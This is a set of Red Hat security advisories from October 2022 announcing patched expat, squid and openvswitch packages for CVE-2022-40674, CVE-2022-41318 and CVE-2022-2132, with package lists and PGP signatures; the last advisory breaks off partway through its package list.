Red Hat Security Advisory 2022-6838-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6838-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6838  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
expat-debuginfo-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.aarch64.rpm  
expat-devel-2.2.10-12.el9_0.3.aarch64.rpm

ppc64le:  
expat-debuginfo-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debugsource-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-devel-2.2.10-12.el9_0.3.ppc64le.rpm

s390x:  
expat-debuginfo-2.2.10-12.el9_0.3.s390x.rpm  
expat-debugsource-2.2.10-12.el9_0.3.s390x.rpm  
expat-devel-2.2.10-12.el9_0.3.s390x.rpm

x86_64:  
expat-debuginfo-2.2.10-12.el9_0.3.i686.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.i686.rpm  
expat-debugsource-2.2.10-12.el9_0.3.x86_64.rpm  
expat-devel-2.2.10-12.el9_0.3.i686.rpm  
expat-devel-2.2.10-12.el9_0.3.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
expat-2.2.10-12.el9_0.3.src.rpm

aarch64:  
expat-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.aarch64.rpm

ppc64le:  
expat-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debugsource-2.2.10-12.el9_0.3.ppc64le.rpm

s390x:  
expat-2.2.10-12.el9_0.3.s390x.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.s390x.rpm  
expat-debugsource-2.2.10-12.el9_0.3.s390x.rpm

x86_64:  
expat-2.2.10-12.el9_0.3.i686.rpm  
expat-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.i686.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.i686.rpm  
expat-debugsource-2.2.10-12.el9_0.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9BEdzjgjWX9erEAQgpEw//SAVaBRrOgFmB37H+zj9VIGGk+//euxLS  
eXo9/Yn+ysPrdDzSVMxPVoiUY7oyNmuf1tDhacy8p90ZJ+SqpbL2pqAxcVMgq0TF  
8ZMYh54aYp6UM559jonyw8vybrp9YA1LEas3PpctLESErqoM7zLD40oxG0f/o9ly  
K5ezEmbWtdRbkHGbx0waQEZdRinVVtRCnLU8tjRjaTl7/3129O9Qa8qYMhAx4IB4  
pCL8ZCSwFGeQ4va0vHZkcw1x2Qx5WVrFbRV68AYTV/ISGh/bQtPUT+Zk1y/KZKwy  
LQmjw4nX1I8Zpue4+yddOaApdlpTk5CSWkAIUDJOtm/GiKF/nKn6tkZm+LgobpSP  
bUaipq+MbDDsNlnL5vFYob1aqdGvCPh6CKDpbJ2zFFF8dEKMzp4ugJAOD1IVECk0  
5GUwLjo2TuMNJkARQYlZrWkgt5SDt+Rev1tJ4c+GoUiXG2BNzvPG3od+nPUfJEId  
NMDQ5wnyOdXrNV4bDp2A8E4B523YbeaMZ0hbT9k+A7n4ICJMfcxLdwYWR4Eefq7S  
rWHFYDEmrhFUCaB8CwS7yeCkig4xhHY2PeDTjSyorCkQ4hWdKWrhZLT4qEs0ZcQ0  
rTwCDyF0nu4d0V4jMb+gg1GVLFj4I6bhSSGCMf0phGIBF2nwLKuiBbzEPU4S1I1J  
v9xf4LYIGu8=wW9n  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6838-01

Red Hat Security Advisory 2022-6839-01 - Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: squid security update  
Advisory ID:       RHSA-2022:6839-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6839  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-41318  
====================================================================  
1. Summary:

An update for squid is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Squid is a high-performance proxy caching server for web clients,  
supporting FTP, Gopher, and HTTP data objects.

Security Fix(es):

* squid: buffer-over-read in SSPI and SMB authentication (CVE-2022-41318)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the squid service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2129771 - CVE-2022-41318 squid: buffer-over-read in SSPI and SMB authentication

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
squid-5.2-1.el9_0.2.src.rpm

aarch64:  
squid-5.2-1.el9_0.2.aarch64.rpm  
squid-debuginfo-5.2-1.el9_0.2.aarch64.rpm  
squid-debugsource-5.2-1.el9_0.2.aarch64.rpm

ppc64le:  
squid-5.2-1.el9_0.2.ppc64le.rpm  
squid-debuginfo-5.2-1.el9_0.2.ppc64le.rpm  
squid-debugsource-5.2-1.el9_0.2.ppc64le.rpm

s390x:  
squid-5.2-1.el9_0.2.s390x.rpm  
squid-debuginfo-5.2-1.el9_0.2.s390x.rpm  
squid-debugsource-5.2-1.el9_0.2.s390x.rpm

x86_64:  
squid-5.2-1.el9_0.2.x86_64.rpm  
squid-debuginfo-5.2-1.el9_0.2.x86_64.rpm  
squid-debugsource-5.2-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41318  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A/tzjgjWX9erEAQgfZA/9HJUFYJLUsflB+655ZYluYALZgLYXdyUR  
5LdEVLft4Xk+0BNEII+F0ccPT6qYAFRQ65asWPVZtPKsOc9j8/B1AZ+LLXp9kYcV  
a6RfRVxjc/krmvAl7RysKNjg7QSagTsysMIZ3Bz+aiYKJuiESG5c7EedTHDTX2a2  
S0ZFHkIMID7NJrWAacnkYsSsMUO3Rz3kWBe163lC1Is8pSj0P+Z59qAu26Jrb8Jl  
0oMocTuVl+9QgVJF2GkybK45VxCVNlR8jNBsydrEilm/4rjdQAX0n2dxwYAL4Hu+  
Q6tf+Ifg6YsTPSQtex1ezSvq8cY4INmxAcfGy6mB3FUV1JXLcMmXbj7J6xsyX244  
eGI/4b8cAMOA6tFzx0cIMVvshHBRNw3iyp2Pi9M245VVBRBatGwQ4KVBq0XESKwB  
WArsEN9ZiJKi1F3qgwWIG6gL/l9bTHtQn1gkset3NnmVnT/JjJdzf5azP9TckEA7  
+WyRdC7Pcoi60aRrkMgMgycnLVdBNALY+rRJxSDy+pkmg0EIBQTUJoHHDqyKS/ei  
jebgINvq/zAMHzO+xzmIimJcqVbDU2pIPhTXYiFL0s5MJqsxSmJmG/Nc093QuHsE  
T7koB327qXVDu5RlGNf42Almw46/zWG7AaZtQUV7TOqM67LUCwsNPSJ6s1HCXZ+C  
LLsk+QabmmU=lAus  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6839-01

Red Hat Security Advisory 2022-6850-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openvswitch2.11 security update  
Advisory ID:       RHSA-2022:6850-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6850  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-2132  
====================================================================  
1. Summary:

An update for openvswitch2.11 is now available for Fast Datapath for Red  
Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 7 - noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: DoS when a Vhost header crosses more than two descriptors and  
exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 7:

Source:  
openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

noarch:  
openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

ppc64le:  
openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

s390x:  
openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.s390x.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm

x86_64:  
openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.x86_64.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A9NzjgjWX9erEAQhS6g//dFhnNsL6tYKMlk4Lrp34SksiKG0a7mVh  
pUzeQLBdgCIJ/AW/nYYAKdmLPAA9tbmYPGPEDq4lch7TmCqSTfurW+XJtddfiBjv  
MWFFGBEtTBZRB4T5RskKTjjgdwJdXSVX2D+LTFI7Z2ZdGvhtc6DcdYbvowP7S4Ni  
dZDx7ByueVuM0jJlHePgUMLv8SvT64SDPNWSJqsgM8MLWOMrBRc1RoOwYmWpRYJp  
ohvwvEbEiS6F8g6vDQGhVph2b0v5HYnjFvt5H3TaGVFlzbfsi+2orkXFnJQZ6ube  
I4HTboCKF4dYGiiSgMEOOYF6dbly4uw7cg+g8dlF8KpbQJKfGvyuD5WqKKnmFC+6  
Q031OQK6OzEfcq2LjJgnxq0CA4JjptO0dhfYPgZ8k1wRu/ZmHFs/fTydn7yihWj3  
ux3zkyjOIQUvpfxapxEfZ/DgiR1cU8zqN+Z5SGc365BdkYB2DlqUnFQFEqsLxIId  
R/HeMM1zn7MZ8V+n2pA2vV4HmKdYD8134ukT0B0El1cceERKDMZFKZLi/iXNIEhm  
xJQ+ibu8e/+JngOhmEmDHz2QQaEyIav6jceWCNig59By5oGfRJ8fvq7TQ1TtECDt  
b9imH8r/ylKbjhaPyvrGbPuV7ARuKQxs5/r/UhIAA1kvPrt1jGxST6jUeVO/Mi6K  
3jv+d9QUyS4!Lp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6850-01

Red Hat Security Advisory 2022-6831-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6831-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6831  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
expat-2.2.5-4.el8_4.4.src.rpm

aarch64:  
expat-2.2.5-4.el8_4.4.aarch64.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.aarch64.rpm  
expat-debugsource-2.2.5-4.el8_4.4.aarch64.rpm  
expat-devel-2.2.5-4.el8_4.4.aarch64.rpm

ppc64le:  
expat-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-debugsource-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-devel-2.2.5-4.el8_4.4.ppc64le.rpm

s390x:  
expat-2.2.5-4.el8_4.4.s390x.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.s390x.rpm  
expat-debugsource-2.2.5-4.el8_4.4.s390x.rpm  
expat-devel-2.2.5-4.el8_4.4.s390x.rpm

x86_64:  
expat-2.2.5-4.el8_4.4.i686.rpm  
expat-2.2.5-4.el8_4.4.x86_64.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.i686.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.x86_64.rpm  
expat-debugsource-2.2.5-4.el8_4.4.i686.rpm  
expat-debugsource-2.2.5-4.el8_4.4.x86_64.rpm  
expat-devel-2.2.5-4.el8_4.4.i686.rpm  
expat-devel-2.2.5-4.el8_4.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7svtzjgjWX9erEAQjaTg//ZLhz2g9jo1UyFDwiXv2ikm12gbo/z39B  
LrIK+cISbaj2ZmnYaaOVBctGaaM6iwjjw8EnDJUC3VkkIZLE80TD4D3mmUtQa8J/  
g35XEUZR5mxj/34UCH0eiHJ/IuDyEsNh7n8Tk4H8KjdNCUH5Z4F/m3DLXnG+rEnz  
Vc57sI/BBbMsLuYzdrV/+LUAXl3JNusv5MkkB6dlGd6BkVaJYP4YYCU8AZRYPaj4  
2u6lxeUYkrKnFAfgbI/uBxQvHyCZt+7ssbSQSMMkEzEYWbsRz143ykP7Q0ybZ/JL  
NwzflfH8czIESyWID1fwlwGJbBFIZkvLp8Zaf7hqhW/TdcGWb4yRXYnkaMzemYG1  
YUaJRJ0ix6F058q6SpoRNscjFIB9zOGkdtaZY1W0Uq4BqHwO5hj2lhPfEdfxOBlk  
BCfq5nbvOktd6jP9GntJHTJwA/nLyaj8fhBMWlzPqoSvfeL6SAmW+RV3SRsjpmGD  
vbrf5CeFsz2BawRAB+W63PYmYx60F1xarmhwlUqdt6FsF87V6k6hiV/NkZMvzs5Q  
l2e8PR9IUzkapp1pMDc5EC1RhBv8e6hS16C7iFnqEwmOFEF1hmLo2PK38jgOaEvH  
tiSmbSFKL4UQsn7byPAjpY8T+pKFxfVfAyOV67LfKzQ+T6m+Si/WHt+u6G2Yra3A  
wyAFjcY9yPE=livL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6831-01

Red Hat Security Advisory 2022-6832-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6832-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6832  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2):

Source:  
expat-2.2.5-3.el8_2.3.src.rpm

aarch64:  
expat-2.2.5-3.el8_2.3.aarch64.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.aarch64.rpm  
expat-debugsource-2.2.5-3.el8_2.3.aarch64.rpm  
expat-devel-2.2.5-3.el8_2.3.aarch64.rpm

ppc64le:  
expat-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-debugsource-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-devel-2.2.5-3.el8_2.3.ppc64le.rpm

s390x:  
expat-2.2.5-3.el8_2.3.s390x.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.s390x.rpm  
expat-debugsource-2.2.5-3.el8_2.3.s390x.rpm  
expat-devel-2.2.5-3.el8_2.3.s390x.rpm

x86_64:  
expat-2.2.5-3.el8_2.3.i686.rpm  
expat-2.2.5-3.el8_2.3.x86_64.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.i686.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.x86_64.rpm  
expat-debugsource-2.2.5-3.el8_2.3.i686.rpm  
expat-debugsource-2.2.5-3.el8_2.3.x86_64.rpm  
expat-devel-2.2.5-3.el8_2.3.i686.rpm  
expat-devel-2.2.5-3.el8_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7slNzjgjWX9erEAQhubRAAhOwHmqgokhhYOsZjMdN6KaDUqts5+19U  
/t3sBxAMYNehzxCDTKbt1hf2kEJDD7V7pcZ/VcbKyb2iWisYxPMVFxvRfc6tcB87  
M9UIKYyhC8CsFQKxijFpWRIOhhH/hEc2eetC1RlkAYotrBcmVthguNHmGgEfaN0N  
kZTXcBsXm9jrO8UhyJakXMvHD6C9PsMLTrJYcDZbBJZpLSoGvAOlFlKjaz2VMY+7  
HPqdKZpPqmHR2PxsEPYXmk0mzQxzxPW6o8oHiheaHz8CkKH+97oNXEawVjuczGxk  
62JNTB+OtVlpMt7ppngc0Go3eTmVj9Hr8uDDt83HU/sN5BhSoXRCZjVNodvhgjAN  
hSD8sAfQSosZh5fX1QXMIql16ZudyxlyIXdPub3w4I7ZUCG7v69cHSY1b8b9HKyF  
dpkgWrvtTaTVe0CSU3xcDijwng0MqJWLsAIjPvk3/DdJI4hdXd7iPGeQFkqTqiOA  
Lf8v45vwjK9ngfj1PbHptBlxG+bfYPyGCVPu10TniVlobrUXQaYrzut4lyZZFMyp  
EhFoenudt86L6vOo8s9/ZaIlZimhWH+zlcwdw4ksVQ/cCVeKTHG6v7lbTL07TOPs  
d38rmnyJd/ulrGC9T1Rj8ZMMQ3D+c1xF6R8g1leE/t3mD718bfjnrPN7umx/d/Av  
TQMo3Q0dgVo=qSey  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6832-01

Red Hat Security Advisory 2022-6834-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6834-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6834  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

ppc64:  
expat-2.1.0-15.el7_9.ppc.rpm  
expat-2.1.0-15.el7_9.ppc64.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64.rpm  
expat-devel-2.1.0-15.el7_9.ppc.rpm  
expat-devel-2.1.0-15.el7_9.ppc64.rpm

ppc64le:  
expat-2.1.0-15.el7_9.ppc64le.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64le.rpm  
expat-devel-2.1.0-15.el7_9.ppc64le.rpm

s390x:  
expat-2.1.0-15.el7_9.s390.rpm  
expat-2.1.0-15.el7_9.s390x.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390x.rpm  
expat-devel-2.1.0-15.el7_9.s390.rpm  
expat-devel-2.1.0-15.el7_9.s390x.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
expat-debuginfo-2.1.0-15.el7_9.ppc.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64.rpm  
expat-static-2.1.0-15.el7_9.ppc.rpm  
expat-static-2.1.0-15.el7_9.ppc64.rpm

ppc64le:  
expat-debuginfo-2.1.0-15.el7_9.ppc64le.rpm  
expat-static-2.1.0-15.el7_9.ppc64le.rpm

s390x:  
expat-debuginfo-2.1.0-15.el7_9.s390.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390x.rpm  
expat-static-2.1.0-15.el7_9.s390.rpm  
